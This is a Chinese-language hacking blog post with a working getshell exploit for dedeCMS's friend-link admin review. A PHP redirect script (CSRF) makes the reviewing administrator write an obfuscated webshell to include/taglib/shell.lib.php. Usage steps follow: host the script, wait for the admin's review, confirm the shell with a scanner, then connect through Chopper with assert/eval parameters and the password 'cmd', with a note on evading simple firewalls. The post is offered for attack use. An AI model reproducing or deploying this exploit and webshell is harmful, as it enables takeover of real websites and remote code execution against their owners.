当前位置: iick's blog > 网站漏洞 > dedeCMS友情链接getshell漏洞利用

dedeCMS友情链接getshell漏洞利用

作者:hack1990 时间:17-01-14 阅读数:6233人阅读

1.php


<?php
//print_r($_SERVER);
$referer = $_SERVER['HTTP_REFERER'];
$dede_login = str_replace("friendlink_main.php","",$referer);//去掉friendlink_main.php,取得dede后台的路径
//拼接 exp
$muma = '<'.'?'.'p'.'h'.'p'.' '.'p'.'h'.'p'.'i'.'n'.'f'.'o'.'('.')'.';'.'?'.'>'.'<'.'?'.'p'.'h'.'p'.' '.'e'.'x'.'t'.'r'.'a'.'c'.'t'.'('.'$'.'_'.'G'.'E'.'T'.')'.'.'.'$'.'a'.'('.'$'.'b'.'['.'0'.']'.')'.';'.'?'.'>';
$exp = 'tpl.php?action=savetagfile&actiondo=addnewtag&content='. $muma .'&filename=shell.lib.php';
$url = $dede_login.$exp;
//echo $url;
header("location: ".$url);
// send mail coder
exit();
?>


把1.php上传到你的空间域名


站长审核后台友情连接  后生成一句话地址为http://hack1990.com//include/taglib/shell.lib.php


御剑字典添加/include/taglib/shell.lib.php测试是否存活即可


最后菜刀访问传参一句话http://hack1990.com//include/taglib/shell.lib.php?a=assert&b[0]=@eval($_POST[cmd]);


密码为cmd


过简单防火墙


# dedeCMS友情链接getshell漏洞利用# Hack1990.Com

上一篇:ASP一句话也可以奇葩

下一篇:疯狂的身份证:一张身份证如何攻破人脸识别技术

相关文章

评论列表

  •  
    发布于 2017-03-21 10:13:14  回复
  • dede的貌似已经不怎么注重安全问题了,上次给朋友做的站,2个月就被别人拿下了,我还一直帮更新,悲催

发表评论